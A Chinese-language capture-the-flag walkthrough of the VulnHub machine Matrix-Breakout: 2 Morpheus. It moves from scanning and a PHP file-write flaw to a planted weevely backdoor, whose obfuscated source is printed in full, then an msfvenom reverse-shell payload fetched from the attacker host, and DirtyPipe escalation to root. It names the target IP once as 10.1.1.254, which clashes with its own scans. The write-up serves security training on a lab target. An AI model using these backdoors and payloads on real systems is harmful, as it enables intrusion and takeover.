Matrix Breakout:2 Morpheus
靶机信息
名称:Matrix-Breakout: 2 Morpheus
地址:
https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
虽然作者提示该靶机最好是在VirtualBox部署,但是经过测试,本靶机在VirtualBox无法启动,更适合导入到Vmware中。
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.154 00:0c:29:e3:18:3e 1 60 VMware, Inc.
10.1.1.254 00:50:56:e9:4a:e8 1 60 VMware, Inc.
利用Kali Linux的netdiscover工具识别目标主机的IP地址为10.1.1.254
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.154 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 06:11 EDT
Nmap scan report for bogon (10.1.1.154)
Host is up (0.00088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open http nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:E3:18:3E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds
NMAP扫描结果表明目标足迹有3个开放端口:22(ssh)、80(http)、81(http)
获得Shell
首先利用浏览器访问80端口,将图片下载到本地:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls
nmap_full_scan trinity.jpeg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ steghide extract -sf trinity.jpeg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ stegseek trinity.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.67% (133.0 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ exiftool trinity.jpeg
ExifTool Version Number : 12.49
File Name : trinity.jpeg
Directory : .
File Size : 44 kB
File Modification Date/Time : 2023:04:09 06:14:06-04:00
File Access Date/Time : 2023:04:09 06:15:07-04:00
File Inode Change Date/Time : 2023:04:09 06:14:06-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Image Width : 709
Image Height : 399
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 709x399
Megapixels : 0.283
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ binwalk -e trinity.jpeg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
382 0x17E Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
从图片本身没有得到更多的信息。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/robots.txt
There's no white rabbit here. Keep searching!
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ nikto -h http://10.1.1.154
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.154
+ Target Hostname: 10.1.1.154
+ Target Port: 80
+ Start Time: 2023-04-09 06:14:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 15c, size: 5cf63c252ab85, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7889 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-04-09 06:15:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.51) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ gobuster dir -u http://10.1.1.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
2023/04/09 06:17:21 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 348]
/javascript (Status: 301) [Size: 313] [--> http://10.1.1.154/javascript/]
/robots.txt (Status: 200) [Size: 47]
/graffiti.txt (Status: 200) [Size: 139]
/graffiti.php (Status: 200) [Size: 451]
/.php (Status: 403) [Size: 275]
/.html (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 1318968 / 1323366 (99.67%)
===============================================================
2023/04/09 06:19:32 Finished
===============================================================
利用Gobuster工具识别出两个文件:graffiti.txt,graffiti.php,访问这两个文件:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/graffiti.txt
Mouse here - welcome to the Nebby!
Make sure not to tell Morpheus about this graffiti wall.
It's just here to let us blow off some steam.
http://10.1.1.154/graffiti.php
访问该URL,可以发送message,经过简单测试,Message字段存在XSS跨站脚本攻击漏洞,但是不好利用这个漏洞,继续分析。
利用Burpsuite拦截请求,发现在利用post提交message的时候,有参数file
因此可能存在本地文件包含漏洞。
修改为:
message=bob&file=../../../../../etc/passwd
但是返回:"Cannot open file: ../../../../../etc/passwd",可以用php filter绕过过滤:
message=bob&file=php://filter/convert.base64-encode/resource=graffiti.php
得到返回:
PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpZbTlpQ2c9PQ==
─(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ echo 'PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpZbTlpQ2c9PQ==' | base64 -d
<h1>
<center>
Nebuchadnezzar Graffiti Wall
</center>
</h1>
<p>
<?php
$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['file'])) {
$file=$_POST['file'];
}
if (isset($_POST['message'])) {
$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
fwrite($handle, $_POST['message']);
fwrite($handle, "\n");
fclose($file);
}
}
// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
echo fgets($handle);
echo "<br>\n";
}
fclose($handle);
?>
<p>
Enter message:
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
Ym9iCg==
从代码可知:
$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
在Message部分协议php reverse shell代码,然后File字段比如叫做jason_shell.php
这样就会将message的内容写入jason_shell.php文件中。
上传php reverse代码出错,看来不能上传长度过长的代码,改用weevely产生backdoor.php
──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely generate jason backdoor.php
Generated 'backdoor.php' with password 'jason' of 764 byte size.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls -alh
total 64K
drwxr-xr-x 2 kali kali 4.0K Apr 9 06:46 .
drwxr-xr-x 19 kali kali 4.0K Apr 9 06:08 ..
-rw-r--r-- 1 kali kali 764 Apr 9 06:46 backdoor.php
-rwx------ 1 kali kali 2.3K Apr 9 06:40 jason_shell.php
-rw-r--r-- 1 root root 966 Apr 9 06:11 nmap_full_scan
-rw-r--r-- 1 kali kali 44K Apr 9 06:14 trinity.jpeg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ cat backdoor.php
<?php
$K='(:T);$r=@ba:T:Tse64_encode:T(@x(@gzcom:Tpr:Tess($:To),$k):T);print("$p:T$:Tkh$r$kf");}';
$l='Xr2nmj:TeG01":T;function x:T($t,$:Tk){:T$c:T:T=:Tstrlen($k);$l=strlen($t);$:To="";fo:Tr';
$M='$k=:T"2b87:T7b4b";$kh="8:T25b4:T8a9a095":T;:T$kf=:T"0dd5b:Td1f264d";$p:T:T=":TZsMvPw';
$U=':T;}}r:Teturn:T $o;}if (:T@preg:T_ma:Ttc:Th("/$k:Th:T(.+):T$kf/":T,@file_ge:Tt_cont';
$N='ents("php://:Tinput"):T,$m:T)==1) :T{@o:Tb:T_start();@e:Tval(@gzu:Tncom:Tpress(@:Tx(@';
$L=str_replace('p','','cppreate_ppfuncpption');
$H=':T($i=:T0;$i<$l;):T:T:T{for(:T$j=0;($j<:T$c&&:T$i:T<$l);$j++,$i++){$o.=$t{$i}:T^$k{$j}';
$z='bas:Te64_d:Tecode($:Tm[1]:T),$k)));$:To=:T@ob_g:Tet_contents():T;@o:Tb_end_:Tclean';
$F=str_replace(':T','',$M.$l.$H.$U.$N.$z.$K);
$W=$L('',$F);$W();
?>
上传成功,然后在Kali Linux上利用weevely 连接目标主机得到shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely http://10.1.1.154/backdoor.php jason
[+] weevely 4.0.1
[+] Target: 10.1.1.154
[+] Session: /home/kali/.weevely/sessions/10.1.1.154/backdoor_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@morpheus:/var/www/html $
提权
下一步的目标是提权,可以先通过现有的shell产生meterpreter会话
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf
将所创建的escalate.elf文件上传到目标主机的tmp目录,并赋予可执行权限
www-data@morpheus:/var/www/html $ cd /tmp
www-data@morpheus:/tmp $ which wget
/usr/bin/wget
www-data@morpheus:/tmp $ wget http://10.1.1.143:8000/escalate.elf
--2023-04-09 18:55:17-- http://10.1.1.143:8000/escalate.elf
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'
0K 100% 58.5M=0s
2023-04-09 18:55:17 (58.5 MB/s) - 'escalate.elf' saved [207/207]
www-data@morpheus:/tmp $ chmod +x escalate.elf
在Kali Linux测启动msfconsole ,并使用exploit/multi/handler启动侦听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.1.1.143:6666
[*] Sending stage (1017704 bytes) to 10.1.1.154
[*] Meterpreter session 1 opened (10.1.1.143:6666 -> 10.1.1.154:53696) at 2023-04-09 06:57:57 -0400
这样Kali Linxu与目标主机之间建立了meterpreter会话
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.1.1.154 - Collecting local exploits for x86/linux...
[*] 10.1.1.154 - 174 exploit checks are being tried...
[+] 10.1.1.154 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.10.0
[+] 10.1.1.154 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.1.1.154 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] 10.1.1.154 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.10.0
2 exploit/linux/local/su_login Yes The target appears to be vulnerable.
3 exploit/linux/local/ubuntu_enlightenment_mount_priv_esc Yes The target appears to be vulnerable.
选择第一个漏洞利用模块:
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2022_0847_dirtypipe
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > show options
Module options (exploit/linux/local/cve_2022_0847_dirtypipe):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
SUID_BINARY_PATH /bin/passwd no The path to a suid binary
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run
[*] Started reverse TCP handler on 10.1.1.143:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.xbscjxphxw /bin/passwd'
[*] Sending stage (3045348 bytes) to 10.1.1.154
[+] Deleted /tmp/.xbscjxphxw
[*] Meterpreter session 2 opened (10.1.1.143:8888 -> 10.1.1.154:52560) at 2023-04-09 07:50:39 -0400
meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > shell
Process 2466 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------ 4 root root 4.0K Nov 29 2021 .
drwxr-xr-x 19 root root 4.0K Oct 28 2021 ..
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-rw------- 1 root root 79 Oct 28 2021 .lesshst
drwxr-xr-x 3 root root 4.0K Oct 28 2021 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 66 Oct 28 2021 .selected_editor
drwxr-xr-x 2 root root 4.0K Oct 28 2021 .vim
-rw------- 1 root root 11K Oct 28 2021 .viminfo
-rw------- 1 root root 54 Oct 28 2021 FLAG.txt
cat FLAG.txt
You've won!
Let's hope Matrix: Resurrections rocks!
至此得到root shell和root flag
经验教训
-
对于Web应用尤其是涉及POST请求方法的靶机不能偷懒,最好使用Burpsuite工具对请求进行分析
-
php filter使用时,首先看下这个Php文件本身,是否有返回,有些时候需要加上.php扩展名,有些时候不需要,如果这个Php文件本身返回,然后看是否可以去读取其他文件,比如/etc/passwd,/var/log/access.log文件